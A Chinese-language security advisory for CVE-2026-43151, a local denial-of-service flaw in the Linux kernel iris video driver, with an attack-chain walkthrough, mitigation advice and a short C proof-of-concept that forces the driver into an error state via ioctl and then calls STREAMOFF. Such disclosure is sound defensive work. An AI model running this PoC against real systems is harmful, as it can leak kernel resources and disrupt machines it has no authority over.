CVE-2026-43151 CVSS 5.5 中危

CVE-2026-43151: Linux内核iris驱动停止流媒体逻辑漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43151

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的media: iris驱动程序存在逻辑错误。当实例处于IRIS_INST_ERROR状态时，stop_streaming操作被错误跳过，导致视频缓冲区无法归还给vb2核心，引发资源泄漏。此外，用户空间无法在会话失败后进行有效清理，致使固件状态不一致，影响系统可用性。

技术细节

该漏洞源于iris驱动中对错误状态处理的逻辑缺陷。当实例因配置不支持等原因进入IRIS_INST_ERROR状态时，驱动会跳过stop_streaming回调。这导致两个后果：一是已分配的缓冲区未返回到vb2队列，造成内存泄漏及内核警告；二是用户空间尝试停止流媒体清理会话时操作失败，导致硬件固件处于不一致状态。本地低权限攻击者可通过触发错误状态并尝试释放资源来利用此漏洞，造成系统拒绝服务。

攻击链分析

STEP 1

步骤1: 访问视频设备

本地攻击者打开受影响的iris视频设备节点（如/dev/video0）。

STEP 2

步骤2: 触发错误状态

攻击者通过ioctl发送不支持的配置参数，迫使驱动实例进入IRIS_INST_ERROR状态。

STEP 3

步骤3: 尝试清理资源

攻击者调用VIDIOC_STREAMOFF尝试停止流媒体并清理缓冲区。

STEP 4

步骤4: 漏洞触发

由于存在缺陷的逻辑检查，驱动跳过了stop_streaming操作，导致缓冲区泄漏和固件状态不一致，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43151
 * This code attempts to trigger the iris driver vulnerability
 * by forcing an error state and then attempting cleanup.
 */

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/videodev2.h>

int main() {
    int fd = open("/dev/video0", O_RDWR);
    if (fd < 0) return -1;

    struct v4l2_format fmt;
    fmt.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
    // Configure an unsupported parameter to trigger IRIS_INST_ERROR
    // (Specifics depend on hardware capabilities)
    fmt.fmt.pix_mp.width = 0; 
    fmt.fmt.pix_mp.height = 0;
    
    // This call is expected to fail, transitioning instance to error state
    ioctl(fd, VIDIOC_S_FMT, &fmt);

    // Attempt standard streaming cleanup
    // In vulnerable versions, stop_streaming is skipped internally
    // due to the IRIS_INST_ERROR check, leaving firmware inconsistent.
    int type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
    ioctl(fd, VIDIOC_STREAMOFF, &type);

    close(fd);
    return 0;
}

影响范围

Linux Kernel (包含commit ad699fa78b59241c9d71a8cafb51525f3dab04d4的版本)

防御指南

临时缓解措施

限制非特权用户对视频设备文件的访问权限，直到系统完成内核更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表